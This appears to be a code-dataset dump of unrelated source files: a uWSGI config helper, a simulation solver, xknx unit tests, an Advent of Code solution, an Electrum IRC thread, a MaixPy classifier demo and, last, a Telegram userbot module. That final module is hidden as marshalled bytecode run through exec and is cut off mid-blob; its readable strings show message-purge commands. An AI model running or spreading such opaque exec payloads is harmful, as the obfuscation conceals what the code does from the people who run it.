If not set, filename containing status code is presumed: 400.html, 500.html, etc.
:param str common_prefix: Common path (prefix) for all files.
"""
statuses = [403, 404, 500]
if common_prefix:
if not codes_map:
codes_map = {code: f'{code}.html' for code in statuses}
for code, filename in codes_map.items():
codes_map[code] = os.path.join(common_prefix, filename)
for code, filepath in codes_map.items():
self.set_error_page(code, filepath)
return self._section
def set_geoip_params(self, db_country=None, db_city=None):
"""Sets GeoIP parameters.
* http://uwsgi.readthedocs.io/en/latest/GeoIP.html
:param str db_country: Country database file path.
:param str db_city: City database file path. Example: ``GeoLiteCity.dat``.
"""
self._set('geoip-country', db_country, plugin='geoip')
self._set('geoip-city', db_city, plugin='geoip')
return self._section
def header_add(self, name, value):
"""Automatically add HTTP headers to response.
:param str name:
:param str value:
"""
self._set('add-header', f'{name}: {value}', multi=True)
return self._section
def header_remove(self, value):
"""Automatically remove specified HTTP header from the response.
:param str value:
"""
self._set('del-header', value, multi=True)
return self._section
def header_collect(self, name, target_var, pull=False):
"""Store the specified response header in a request var
(optionally removing it from the response).
:param str name:
:param str target_var:
:param bool pull: Whether to remove header from response.
"""
self._set(
'pull-header' if pull else 'collect-header',
f'{name} {target_var}',
multi=True
)
return self._section
| 31.735714 | 110 | 0.637332 |
382a21773a33f3d0ef34fe435bc30972d50ff231 | 2,126 | py | Python | implicit_solver/lib/system/solver.py | vincentbonnetcg/Numerical-Bric-a-Brac | e71f2305d7452de985e5e9fa8935da611b6d9992 | [
"MIT"
] | 14 | 2019-05-04T00:42:47.000Z | 2021-09-07T09:57:44.000Z | implicit_solver/lib/system/solver.py | vincentbonnetcg/Numerical-Bric-a-Brac | e71f2305d7452de985e5e9fa8935da611b6d9992 | [
"MIT"
] | null | null | null | implicit_solver/lib/system/solver.py | vincentbonnetcg/Numerical-Bric-a-Brac | e71f2305d7452de985e5e9fa8935da611b6d9992 | [
"MIT"
] | 5 | 2020-12-07T21:44:41.000Z | 2021-09-13T05:29:54.000Z | """
@author: Vincent Bonnet
@description : Solver to orchestrate the step of a solver
"""
import core
from lib.system import Scene
from core import Details
class SolverContext:
'''
SolverContext to store time, time stepping, etc.
'''
def __init__(self, time = 0.0, frame_dt = 1.0/24.0, num_substep = 4, num_frames = 1):
self.time = time # current time (in seconds)
self.start_time = time # start time (in seconds)
self.end_time = time + (num_frames * frame_dt) # end time (in seconds)
self.frame_dt = frame_dt # time step on a single frame (in seconds)
self.num_substep = num_substep # number of substep per frame
self.dt = frame_dt / num_substep # simulation substep (in seconds)
self.num_frames = num_frames # number of simulated frame (doesn't include initial frame)
class Solver:
'''
Solver Implementation
'''
def __init__(self, time_integrator):
self.time_integrator = time_integrator
def initialize(self, scene : Scene, details : Details, context : SolverContext):
'''
Initialize the scene
'''
scene.init_kinematics(details, context)
scene.init_conditions(details)
@core.timeit
def solve_step(self, scene : Scene, details : Details, context : SolverContext):
'''
Solve a single step (pre/step/post)
'''
self._pre_step(scene, details, context)
self._step(scene, details, context)
self._post_step(details, context)
@core.timeit
def _pre_step(self, scene : Scene, details : Details, context : SolverContext):
scene.update_kinematics(details, context)
scene.update_conditions(details) # allocate dynamically new conditions
@core.timeit
def _step(self, scene : Scene, details : Details, context : SolverContext):
self.time_integrator.prepare_system(scene, details, context.dt)
self.time_integrator.assemble_system(details, context.dt)
self.time_integrator.solve_system(details, context.dt)
@core.timeit
def _post_step(self, details, context):
pass
| 34.852459 | 96 | 0.669802 |
afbe35d5e6242dc618515f281dfec9e1090c5d9e | 6,016 | py | Python | test/core_tests/value_reader_test.py | jonppe/xknx | b08a122b0f3c170d91aae6213a60c7038e451c93 | [
"MIT"
] | 1 | 2020-12-27T13:54:34.000Z | 2020-12-27T13:54:34.000Z | test/core_tests/value_reader_test.py | jonppe/xknx | b08a122b0f3c170d91aae6213a60c7038e451c93 | [
"MIT"
] | 1 | 2021-02-17T23:54:32.000Z | 2021-02-17T23:54:32.000Z | test/core_tests/value_reader_test.py | mielune/xknx | 57c248c386f2ae150d983f72a5a8da684097265d | [
"MIT"
] | null | null | null | """Unit test for value reader."""
import asyncio
import unittest
from unittest.mock import patch
from xknx import XKNX
from xknx.core import ValueReader
from xknx.dpt import DPTBinary
from xknx.telegram import GroupAddress, Telegram, TelegramDirection, TelegramType
class TestValueReader(unittest.TestCase):
"""Test class for value reader."""
def setUp(self):
"""Set up test class."""
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
"""Tear down test class."""
self.loop.close()
@patch("xknx.core.ValueReader.timeout")
def test_value_reader_read_success(self, timeout_mock):
"""Test value reader: successfull read."""
xknx = XKNX()
test_group_address = GroupAddress("0/0/0")
response_telegram = Telegram(
group_address=test_group_address,
telegramtype=TelegramType.GROUP_RESPONSE,
direction=TelegramDirection.INCOMING,
payload=DPTBinary(1),
)
value_reader = ValueReader(xknx, test_group_address)
# Create a task for read() (3.5 compatible)
read_task = asyncio.ensure_future(value_reader.read())
# receive the response
self.loop.run_until_complete(value_reader.telegram_received(response_telegram))
# and yield the result
successfull_read = self.loop.run_until_complete(asyncio.gather(read_task))[0]
# GroupValueRead telegram is still in the queue because we are not actually processing it
self.assertEqual(xknx.telegrams.qsize(), 1)
# Callback was removed again
self.assertEqual(xknx.telegram_queue.telegram_received_cbs, [])
# Timeout handle was cancelled (cancelled method requires Python 3.7)
event_has_cancelled = getattr(value_reader.timeout_handle, "cancelled", None)
if callable(event_has_cancelled):
self.assertTrue(value_reader.timeout_handle.cancelled())
# timeout() was never called because there was no timeout
timeout_mock.assert_not_called()
# Telegram was received
self.assertEqual(value_reader.received_telegram, response_telegram)
# Successfull read() returns the telegram
self.assertEqual(successfull_read, response_telegram)
@patch("logging.Logger.warning")
def test_value_reader_read_timeout(self, logger_warning_mock):
"""Test value reader: read timeout."""
xknx = XKNX()
value_reader = ValueReader(xknx, GroupAddress("0/0/0"), timeout_in_seconds=0)
timed_out_read = self.loop.run_until_complete(value_reader.read())
# GroupValueRead telegram is still in the queue because we are not actually processing it
self.assertEqual(xknx.telegrams.qsize(), 1)
# Warning was logged
logger_warning_mock.assert_called_once_with(
"Error: KNX bus did not respond in time (%s secs) to GroupValueRead request for: %s",
0,
GroupAddress("0/0/0"),
)
# Callback was removed again
self.assertEqual(xknx.telegram_queue.telegram_received_cbs, [])
# Timeout handle was cancelled (cancelled method requires Python 3.7)
event_has_cancelled = getattr(value_reader.timeout_handle, "cancelled", None)
if callable(event_has_cancelled):
self.assertTrue(value_reader.timeout_handle.cancelled())
# No telegram was received
self.assertIsNone(value_reader.received_telegram)
# Unsuccessfull read() returns None
self.assertIsNone(timed_out_read)
def test_value_reader_send_group_read(self):
"""Test value reader: send_group_read."""
xknx = XKNX()
value_reader = ValueReader(xknx, GroupAddress("0/0/0"))
self.loop.run_until_complete(value_reader.send_group_read())
self.assertEqual(xknx.telegrams.qsize(), 1)
telegram = xknx.telegrams.get_nowait()
self.assertEqual(
telegram,
Telegram(
group_address=GroupAddress("0/0/0"),
telegramtype=TelegramType.GROUP_READ,
),
)
def test_value_reader_telegram_received(self):
"""Test value reader: telegram_received."""
xknx = XKNX()
test_group_address = GroupAddress("0/0/0")
expected_telegram_1 = Telegram(
group_address=test_group_address,
telegramtype=TelegramType.GROUP_RESPONSE,
direction=TelegramDirection.INCOMING,
payload=DPTBinary(1),
)
expected_telegram_2 = Telegram(
group_address=test_group_address,
telegramtype=TelegramType.GROUP_WRITE,
direction=TelegramDirection.INCOMING,
payload=DPTBinary(1),
)
telegram_wrong_address = Telegram(
group_address=GroupAddress("0/0/1"),
telegramtype=TelegramType.GROUP_RESPONSE,
direction=TelegramDirection.INCOMING,
payload=DPTBinary(1),
)
telegram_wrong_type = Telegram(
group_address=test_group_address,
telegramtype=TelegramType.GROUP_READ,
direction=TelegramDirection.INCOMING,
payload=DPTBinary(1),
)
value_reader = ValueReader(xknx, test_group_address)
def async_telegram_received(test_telegram):
return self.loop.run_until_complete(
value_reader.telegram_received(test_telegram)
)
self.assertFalse(async_telegram_received(telegram_wrong_address))
self.assertFalse(async_telegram_received(telegram_wrong_type))
self.assertIsNone(value_reader.received_telegram)
self.assertTrue(async_telegram_received(expected_telegram_1))
self.assertEqual(value_reader.received_telegram, expected_telegram_1)
self.assertTrue(async_telegram_received(expected_telegram_2))
self.assertEqual(value_reader.received_telegram, expected_telegram_2)
| 40.92517 | 97 | 0.677527 |
2af93665bb776e21644701c6bca41dc9417df9ea | 2,078 | py | Python | 2016/day01/taxicab.py | kmcginn/advent-of-code | 96a8d7d723f6f222d431fd9ede88d0a303d86761 | [
"MIT"
] | null | null | null | 2016/day01/taxicab.py | kmcginn/advent-of-code | 96a8d7d723f6f222d431fd9ede88d0a303d86761 | [
"MIT"
] | null | null | null | 2016/day01/taxicab.py | kmcginn/advent-of-code | 96a8d7d723f6f222d431fd9ede88d0a303d86761 | [
"MIT"
] | null | null | null | def handleTurn(heading, turn):
if heading == 'N':
if turn == 'L':
return 'W'
else:
return 'E'
elif heading == 'S':
if turn == 'L':
return 'E'
else:
return 'W'
elif heading == 'E':
if turn == 'L':
return 'N'
else:
return 'S'
elif heading == 'W':
if turn == 'L':
return 'S'
else:
return 'N'
else:
raise Exception
def updateLocation(heading, x, y, turn, distance):
# update heading
newHeading = handleTurn(heading, turn)
# modify counter
newX = x
newY = y
if newHeading == 'N':
newX = x + distance
elif newHeading == 'S':
newX = x - distance
elif newHeading == 'E':
newY = y + distance
elif newHeading == 'W':
newY = y - distance
else:
raise Exception
return (newHeading, newX, newY)
def processData():
rawData = 'L5, R1, R3, L4, R3, R1, L3, L2, R3, L5, L1, L2, R5, L1, R5, R1, L4, R1, R3, L4, L1, R2, R5, R3, R1, R1, L1, R1, L1, L2, L1, R2, L5, L188, L4, R1, R4, L3, R47, R1, L1, R77, R5, L2, R1, L2, R4, L5, L1, R3, R187, L4, L3, L3, R2, L3, L5, L4, L4, R1, R5, L4, L3, L3, L3, L2, L5, R1, L2, R5, L3, L4, R4, L5, R3, R4, L2, L1, L4, R1, L3, R1, R3, L2, R1, R4, R5, L3, R5, R3, L3, R4, L2, L5, L1, L1, R3, R1, L4, R3, R3, L2, R5, R4, R1, R3, L4, R3, R3, L2, L4, L5, R1, L4, L5, R4, L2, L1, L3, L3, L5, R3, L4, L3, R5, R4, R2, L4, R2, R3, L3, R4, L1, L3, R2, R1, R5, L4, L5, L5, R4, L5, L2, L4, R4, R4, R1, L3, L2, L4, R3'
return rawData.split(', ')
def main():
instructions = processData()
#instructions = ['R5', 'L5', 'R5', 'R3']
heading = 'N'
x = 0
y = 0
for i in instructions:
turn = i[0]
distance = int(i[1:])
result = updateLocation(heading, x, y, turn, distance)
heading = result[0]
x = result[1]
y = result[2]
totalDistance = abs(x) + abs(y)
print(totalDistance)
if __name__ == "__main__":
main()
| 30.558824 | 624 | 0.4923 |
2383a23f7e6bd470a09532a4bca173f6de97fe87 | 6,668 | py | Python | src/ircthread.py | argentumproject/electrum-server-arg | 66a0980b19a9f7dc818f2924948f9534a7dbb632 | [
"MIT"
] | 2 | 2016-12-31T16:28:23.000Z | 2018-05-27T08:08:58.000Z | src/ircthread.py | argentumproject/electrum-server-arg | 66a0980b19a9f7dc818f2924948f9534a7dbb632 | [
"MIT"
] | null | null | null | src/ircthread.py | argentumproject/electrum-server-arg | 66a0980b19a9f7dc818f2924948f9534a7dbb632 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = 'A_' + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum-arg")
def on_join(self, connection, event):
m = re.match("(A_.*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("(A_.*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("(A_.*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith("A_"):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
| 37.251397 | 147 | 0.624325 |
e8c966ffb7bcea053e191563bc58049800ffb94b | 4,577 | py | Python | driver/classify20.py | sipeed/MaixUI | 6c4f473ee70766b827d6ef9350f5fd006d59086c | [
"MIT"
] | 66 | 2020-07-29T16:27:15.000Z | 2022-03-20T13:42:17.000Z | driver/classify20.py | sipeed/MaixUI | 6c4f473ee70766b827d6ef9350f5fd006d59086c | [
"MIT"
] | 3 | 2020-08-10T03:07:57.000Z | 2022-03-19T13:33:50.000Z | driver/classify20.py | sipeed/MaixUI | 6c4f473ee70766b827d6ef9350f5fd006d59086c | [
"MIT"
] | 19 | 2020-08-02T03:04:40.000Z | 2022-02-04T09:52:26.000Z | # This file is part of MaixUI
# Copyright (c) sipeed.com
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
try:
from ui_canvas import ui
import camera
except:
from ui_canvas import ui
import camera
import KPU as kpu
# classify20
anchor = (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025)
classes = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
class HowMany():
is_load = False
task, things = None, None
def load():
if HowMany.is_load == False:
#print(HowMany.load)
HowMany.task = kpu.load(0x5C0000)
#task = kpu.load("/sd/0x5C0000_20class.kmodel")
kpu.init_yolo2(HowMany.task, 0.5, 0.3, 5, (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025))
HowMany.is_load = True
def work(img):
HowMany.things = kpu.run_yolo2(HowMany.task, img)
if HowMany.things:
for pos in range(len(HowMany.things)):
i = HowMany.things[pos]
img.draw_rectangle(320 - (i.x() + i.w()), i.y(), i.w(), i.h())
img.draw_string(320 - (i.x() + i.w()), i.y(), '%.2f:%s' % (i.value(), classes[i.classid()]), color=(0, 255, 0))
return img
def free():
#print(HowMany.free)
try:
if HowMany.is_load:
kpu.deinit(HowMany.task)
HowMany.is_load = False
except Exception as e:
print(e) # see py_kpu_deinit error will mp_raise_TypeError
class MaybeIs():
is_load = False
task, things, result = None, None, None
def load():
if MaybeIs.is_load == False:
#print(MaybeIs.load)
MaybeIs.task = kpu.load(0x5C0000)
#task = kpu.load("/sd/0x5C0000_20class.kmodel")
kpu.init_yolo2(MaybeIs.task, 0.5, 0.3, 5, (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025))
MaybeIs.is_load = True
def work(img):
MaybeIs.things = kpu.run_yolo2(MaybeIs.task, img)
if MaybeIs.things:
value, obj = 0, None
for k in range(len(MaybeIs.things)):
if value < MaybeIs.things[k].value():
value, obj = MaybeIs.things[k].value(), MaybeIs.things[k]
i = MaybeIs.things[k]
MaybeIs.result = classes[i.classid()]
img.draw_rectangle(320 - (i.x() + i.w()), i.y(), i.w(), i.h())
img.draw_string(320 - (i.x() + i.w()), i.y(), '%.2f:%s' % (i.value(), classes[i.classid()]), color=(0, 255, 0))
return img
def free():
#print(MaybeIs.free)
try:
if MaybeIs.is_load:
kpu.deinit(MaybeIs.task)
MaybeIs.is_load = False
except Exception as e:
print(e) # see py_kpu_deinit error will mp_raise_TypeError
if __name__ == "__main__":
ui.height, ui.weight = 480, 320
def test_ai_camera():
@ui.warp_template(ui.blank_draw)
def howmany():
tmp = camera.obj.get_image()
HowMany.work(tmp)
ui.canvas.draw_image(tmp, 0, 0)
ui.display()
@ui.warp_template(ui.blank_draw)
def maybe():
tmp = camera.obj.get_image()
MaybeIs.work(tmp)
ui.canvas.draw_image(tmp, 0, 0)
ui.display()
import time
last = time.ticks_ms()
while True:
try:
HowMany.load()
while True:
try:
print(time.ticks_ms() - last)
last = time.ticks_ms()
howmany()
except Exception as e:
# gc.collect()
print(e)
except KeyboardInterrupt as e:
HowMany.free()
#break
try:
MaybeIs.load()
while True:
try:
print(time.ticks_ms() - last)
last = time.ticks_ms()
maybe()
except Exception as e:
# gc.collect()
print(e)
except KeyboardInterrupt as e:
MaybeIs.free()
#break
test_ai_camera()
| 31.349315 | 205 | 0.506008 |
3b57c731a875e894e52db453e8fbd078d5b68641 | 8,597 | py | Python | userbot/modules/messages.py | oxyda-fox/XBot-Remix | 3d97bea5395b223fc89a8cc6cb699cc624ccc967 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/messages.py | oxyda-fox/XBot-Remix | 3d97bea5395b223fc89a8cc6cb699cc624ccc967 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/messages.py | oxyda-fox/XBot-Remix | 3d97bea5395b223fc89a8cc6cb699cc624ccc967 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | #Encript Marshal By XVenom
#https://github.com/xvenom15
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\xb2\x00\x00\x00d\x00Z\x00d\x01d\x02l\x01m\x02Z\x02\x01\x00d\x01d\x03l\x03m\x04Z\x04\x01\x00d\x01d\x04l\x05m\x06Z\x06m\x07Z\x07m\x08Z\x08\x01\x00d\x01d\x05l\tm\nZ\n\x01\x00e\nd\x06d\x07d\x08\x8d\x02d\td\n\x84\x00\x83\x01Z\x0be\nd\x06d\x0bd\x08\x8d\x02d\x0cd\r\x84\x00\x83\x01Z\x0ce\nd\x06d\x0ed\x08\x8d\x02d\x0fd\x10\x84\x00\x83\x01Z\re\nd\x06d\x11d\x08\x8d\x02d\x12d\x13\x84\x00\x83\x01Z\x0ee\nd\x06d\x14d\x08\x8d\x02d\x15d\x16\x84\x00\x83\x01Z\x0fe\x08\xa0\x10d\x17d\x18i\x01\xa1\x01\x01\x00d\x19S\x00)\x1azC Userbot module for purging unneeded messages(usually spam or ot). \xe9\x00\x00\x00\x00)\x01\xda\x05sleep)\x01\xda\rrpcbaseerrors)\x03\xda\x06BOTLOG\xda\rBOTLOG_CHATID\xda\x08CMD_HELP)\x01\xda\x08registerTz\x08^.purge$)\x02Z\x08outgoingZ\x07patternc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00s\x1c\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01g\x00}\x02|\x00j\x01j\x02|\x01|\x00j\x03d\x02\x8d\x02}\x03d\x03}\x04|\x00j\x03d\x01k\tr\x8a|\x032\x00zN3\x00d\x01H\x00W\x00}\x05|\x02\xa0\x04|\x05\xa1\x01\x01\x00|\x04d\x04\x17\x00}\x04|\x02\xa0\x04|\x00j\x03\xa1\x01\x01\x00t\x05|\x02\x83\x01d\x05k\x02r6|\x00j\x01\xa0\x06|\x01|\x02\xa1\x02I\x00d\x01H\x00\x01\x00g\x00}\x02q66\x00n\x14|\x00\xa0\x07d\x06\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x02r\xb6|\x00j\x01\xa0\x06|\x01|\x02\xa1\x02I\x00d\x01H\x00\x01\x00|\x00j\x01\xa0\x08|\x00j\td\x07t\n|\x04\x83\x01\x9b\x00d\x08\x9d\x03\xa1\x02I\x00d\x01H\x00}\x06t\x0br\xfc|\x00j\x01\xa0\x08t\x0cd\tt\n|\x04\x83\x01\x17\x00d\n\x17\x00\xa1\x02I\x00d\x01H\x00\x01\x00t\rd\x0b\x83\x01I\x00d\x01H\x00\x01\x00|\x06\xa0\x0e\xa1\x00I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0czA For .purge command, purge all messages starting from the reply. 
N)\x01Z\x06min_idr\x01\x00\x00\x00\xe9\x01\x00\x00\x00\xe9d\x00\x00\x00z\x1a`Balas di Pesan Goblokk!!`z1`Berhasil Menghapus Kenangan!` \nSebanyak: u\r\x00\x00\x00 Kenangan\xf0\x9f\x98\xadz\x13Kenangan sebanyak: z\x17 berhasil di bersihkan.\xe9\x02\x00\x00\x00)\x0f\xda\x0eget_input_chat\xda\x06client\xda\riter_messages\xda\x0freply_to_msg_id\xda\x06append\xda\x03lenZ\x0fdelete_messages\xda\x04edit\xda\x0csend_message\xda\x07chat_id\xda\x03strr\x04\x00\x00\x00r\x05\x00\x00\x00r\x02\x00\x00\x00\xda\x06delete)\x07Z\x04purg\xda\x04chatZ\x04msgsZ\x07itermsg\xda\x05count\xda\x03msgZ\x04done\xa9\x00r\x19\x00\x00\x00\xda\x00\xda\nfastpurger\x10\x00\x00\x00s:\x00\x00\x00\x00\x03\x0e\x01\x04\x01\x12\x01\x04\x02\n\x01\x10\x01\n\x01\x08\x01\x0c\x01\x0c\x01\x14\x01\n\x02\x10\x01\x04\x02\x04\x01\x14\x01\x06\x01\x04\x00\x02\x01\x06\xff\x06\xff\n\x04\x04\x01\x06\x01\x02\x01\x0e\xfe\n\x03\x0e\x01r\x1b\x00\x00\x00z\t^.purgemec\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00s\xcc\x00\x00\x00|\x00j\x00}\x01t\x01|\x01d\x01d\x02\x85\x02\x19\x00\x83\x01}\x02d\x03}\x03|\x00j\x02j\x03|\x00j\x04d\x04d\x05\x8d\x022\x00z23\x00d\x02H\x00W\x00}\x01|\x03|\x02d\x03\x17\x00k\x04rH\x01\x00qb|\x03d\x03\x17\x00}\x03|\x01\xa0\x05\xa1\x00I\x00d\x02H\x00\x01\x00q,6\x00|\x00j\x02\xa0\x06|\x00j\x04d\x06t\x07|\x02\x83\x01\x17\x00d\x07\x17\x00\xa1\x02I\x00d\x02H\x00}\x04t\x08r\xa8|\x00j\x02\xa0\x06t\td\x08t\x07|\x02\x83\x01\x17\x00d\t\x17\x00\xa1\x02I\x00d\x02H\x00\x01\x00t\nd\n\x83\x01I\x00d\x02H\x00\x01\x00d\x03}\x03|\x04\xa0\x05\xa1\x00I\x00d\x02H\x00\x01\x00d\x02S\x00)\x0bz5 For .purgeme, delete x count of your latest message.\xe9\t\x00\x00\x00Nr\x08\x00\x00\x00\xda\x02me)\x01Z\tfrom_userz\x1f`Menghapus Kenangan!` Sebanyak z\x08 Sukses.z\x13Berhasil menghapus z\r 
kenangan....r\n\x00\x00\x00)\x0b\xda\x04text\xda\x03intr\x0c\x00\x00\x00r\r\x00\x00\x00r\x13\x00\x00\x00r\x15\x00\x00\x00r\x12\x00\x00\x00r\x14\x00\x00\x00r\x04\x00\x00\x00r\x05\x00\x00\x00r\x02\x00\x00\x00)\x05\xda\x05delme\xda\x07messager\x17\x00\x00\x00\xda\x01i\xda\x04smsgr\x19\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00\xda\x07purgeme2\x00\x00\x00s,\x00\x00\x00\x00\x03\x06\x01\x10\x01\x04\x02\n\x01\x02\xff\x12\x02\x0c\x01\x04\x01\x08\x01\x12\x02\x06\x01\x04\x01\x0e\xfe\n\x04\x04\x01\x06\x01\x02\x01\x0e\xfe\n\x03\x0e\x01\x04\x01r$\x00\x00\x00z\x06^.del$c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x08\x00\x00\x00\xc3\x00\x00\x00s\x80\x00\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x00j\x01r|z8|\x01\xa0\x02\xa1\x00I\x00d\x01H\x00\x01\x00|\x00\xa0\x02\xa1\x00I\x00d\x01H\x00\x01\x00t\x03rJ|\x00j\x04\xa0\x05t\x06d\x02\xa1\x02I\x00d\x01H\x00\x01\x00W\x00n.\x04\x00t\x07j\x08k\nrz\x01\x00\x01\x00\x01\x00t\x03rv|\x00j\x04\xa0\x05t\x06d\x03\xa1\x02I\x00d\x01H\x00\x01\x00Y\x00n\x02X\x00d\x01S\x00)\x04z/ For .del command, delete the replied message. 
Nz"Deletion of message was successfulz\x1eWell, I can\'t delete a message)\tZ\x11get_reply_messager\x0e\x00\x00\x00r\x15\x00\x00\x00r\x04\x00\x00\x00r\x0c\x00\x00\x00r\x12\x00\x00\x00r\x05\x00\x00\x00r\x03\x00\x00\x00Z\x0fBadRequestError)\x02r \x00\x00\x00Z\x07msg_srcr\x19\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00\xda\tdelete_itM\x00\x00\x00s 